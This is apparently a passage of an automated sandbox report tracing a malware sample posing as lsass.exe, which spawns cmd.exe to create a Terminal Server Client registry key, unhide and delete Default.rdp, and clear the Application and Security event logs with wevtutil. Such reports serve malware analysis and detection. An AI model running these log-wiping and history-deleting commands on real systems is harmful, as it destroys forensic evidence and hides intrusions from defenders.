Thread IDs
0x 9E0
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info STD_ERROR_HANDLE type = file_type True 2
Fn
Open STD_ERROR_HANDLE - True 6
Fn
Write STD_ERROR_HANDLE size = 7 True 1
Fn
Data
Write STD_ERROR_HANDLE size = 67 True 1
Fn
Data
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers - False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\reg.exe base_address = 0x920000 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:28 (UTC) True 1
Fn
Get Time type = Ticks, time = 152927 True 1
Fn
Get Time type = Performance Ctr, time = 21467912007 True 1
Fn
Process #29: cmd.exe
58 0
»
Information Value
ID #29
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:34, Reason: Child Process
Unmonitor End Time: 00:01:35, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0xa9c
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A0C
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\reg.exe os_pid = 0xb1c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4acd0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:28 (UTC) True 1
Fn
Get Time type = Ticks, time = 153052 True 1
Fn
Get Time type = Performance Ctr, time = 21481081403 True 1
Fn
Environment (17)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #30: reg.exe
36 0
»
Information Value
ID #30
File Name c:\windows\syswow64\reg.exe
Command Line reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:34, Reason: Child Process
Unmonitor End Time: 00:01:34, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0xb1c
Parent PID 0xa9c (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A08
Host Behavior
File (5)
»
Operation Filename Additional Information Success Count Logfile
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Write STD_OUTPUT_HANDLE size = 39 True 1
Fn
Data
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System - False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers - False 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers size = 2, type = REG_SZ True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\reg.exe base_address = 0x570000 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:29 (UTC) True 1
Fn
Get Time type = Ticks, time = 153130 True 1
Fn
Get Time type = Performance Ctr, time = 21489235113 True 1
Fn
Process #31: cmd.exe
59 0
»
Information Value
ID #31
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:34, Reason: Child Process
Unmonitor End Time: 00:01:35, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0xa98
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9FC
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\attrib.exe os_pid = 0x33c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a530000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:29 (UTC) True 1
Fn
Get Time type = Ticks, time = 153255 True 1
Fn
Get Time type = Performance Ctr, time = 21500543159 True 1
Fn
Environment (18)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = userprofile, result_out = C:\Users\5p5NrGJn0jS HALPmcxz True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #32: attrib.exe
4 0
»
Information Value
ID #32
File Name c:\windows\syswow64\attrib.exe
Command Line attrib "C:\Users\5p5NrGJn0jS HALPmcxz\documents\Default.rdp" -s -h
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:34, Reason: Child Process
Unmonitor End Time: 00:01:35, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x33c
Parent PID 0xa98 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 5CC
Host Behavior
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\attrib.exe base_address = 0xda0000 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:29 (UTC) True 1
Fn
Get Time type = Ticks, time = 153364 True 1
Fn
Get Time type = Performance Ctr, time = 21518022482 True 1
Fn
Process #33: cmd.exe
58 0
»
Information Value
ID #33
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:34, Reason: Child Process
Unmonitor End Time: 00:01:35, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x9b4
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9F4
Host Behavior
File (18)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\documents\Default.rdp type = file_attributes False 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\documents type = file_attributes True 1
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Write STD_ERROR_HANDLE size = 68 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a930000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:29 (UTC) True 1
Fn
Get Time type = Ticks, time = 153473 True 1
Fn
Get Time type = Performance Ctr, time = 21529487013 True 1
Fn
Environment (10)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = userprofile, result_out = C:\Users\5p5NrGJn0jS HALPmcxz True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #34: cmd.exe
59 0
»
Information Value
ID #34
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:35, Reason: Child Process
Unmonitor End Time: 00:01:35, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0xa84
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A88
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info wevtutil.exe type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\wevtutil.exe os_pid = 0xb2c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a620000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:29 (UTC) True 1
Fn
Get Time type = Ticks, time = 153598 True 1
Fn
Get Time type = Performance Ctr, time = 21542432380 True 1
Fn
Environment (17)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #35: wevtutil.exe
0 0
»
Information Value
ID #35
File Name c:\windows\syswow64\wevtutil.exe
Command Line wevtutil.exe clear-log Application
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:35, Reason: Child Process
Unmonitor End Time: 00:01:35, Reason: Self Terminated
Monitor Duration 00:00:00
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xb2c
Parent PID 0xa84 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B30
0x A8C
Process #36: cmd.exe
59 0
»
Information Value
ID #36
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:35, Reason: Child Process
Unmonitor End Time: 00:01:35, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0xa78
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A74
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Get Info wevtutil.exe type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
